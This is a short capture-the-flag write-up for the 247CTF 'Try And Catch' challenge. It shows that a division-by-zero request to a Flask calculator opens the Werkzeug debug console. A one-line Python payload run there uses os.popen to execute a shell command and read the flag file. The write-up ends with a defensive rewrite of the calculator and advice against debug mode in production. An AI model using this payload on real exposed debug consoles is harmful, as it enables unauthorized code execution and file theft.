247CTF - Try And Catch
Find a bug and trigger an exception in a Flask web application to access the debug console.
Vulnerability
Flask debug mode with DebuggedApplication and evalex=True allows interactive code execution through the debugger console. The calculator endpoint accepts division operations and lacks proper exception handling.
Solution
Step 1: Trigger an Exception
Send a division by zero request to the calculator:
https://9894a61910fb83f2.247ctf.com/calculator?number_1=1&number_2=0&operation=%2f
Step 2: Execute Arbitrary Python
The debug console opens. Execute commands to read the flag:
__import__('os').popen('cat ./flag.txt').read()
Key Insight
Never enable Flask debug mode in production. The Werkzeug debugger with evalex=True provides a complete interactive Python console, allowing arbitrary code execution with the web server's privileges.
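As an added example (not the challenge's own code), this is how the calculator logic behind the vulnerable endpoint can be written so that no exception ever escapes to Werkzeug's debugger: the operation parameter is matched against a whitelist and both division by zero and bad operands become ordinary 400 responses. It is dependency-free so it runs without Flask; the Flask view would simply call calculate() with the three query parameters and return the pair it gets back. The function and operation names are assumptions.

```python
import math
import operator

# Allowed operations only; the request's "operation" parameter is looked up
# here rather than being interpolated into any evaluated expression.
OPERATIONS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}


def calculate(number_1, number_2, operation):
    """Return a (status, body) pair for the calculator view.

    Every failure path returns a 400 body instead of raising. That matters
    because with debug mode (DebuggedApplication, evalex=True) an unhandled
    exception, e.g. ZeroDivisionError from number_2=0, is what hands the
    requester an interactive Python console in the server process.
    """
    func = OPERATIONS.get(operation)
    if func is None:
        return 400, {"error": "unsupported operation"}
    try:
        a = float(number_1)
        b = float(number_2)
    except (TypeError, ValueError):
        return 400, {"error": "operands must be numbers"}
    # Reject "inf"/"nan", which float() accepts but which make results meaningless.
    if not (math.isfinite(a) and math.isfinite(b)):
        return 400, {"error": "operands must be finite"}
    try:
        result = func(a, b)
    except ZeroDivisionError:
        return 400, {"error": "division by zero"}
    return 200, {"result": result}


if __name__ == "__main__":
    # The exact request from the writeup, now answered with a 400 instead of a traceback.
    print(calculate("1", "0", "/"))
```

Handling the exception is defence in depth only; the real fix is running the app with debug disabled (no DebuggedApplication, no evalex) in production.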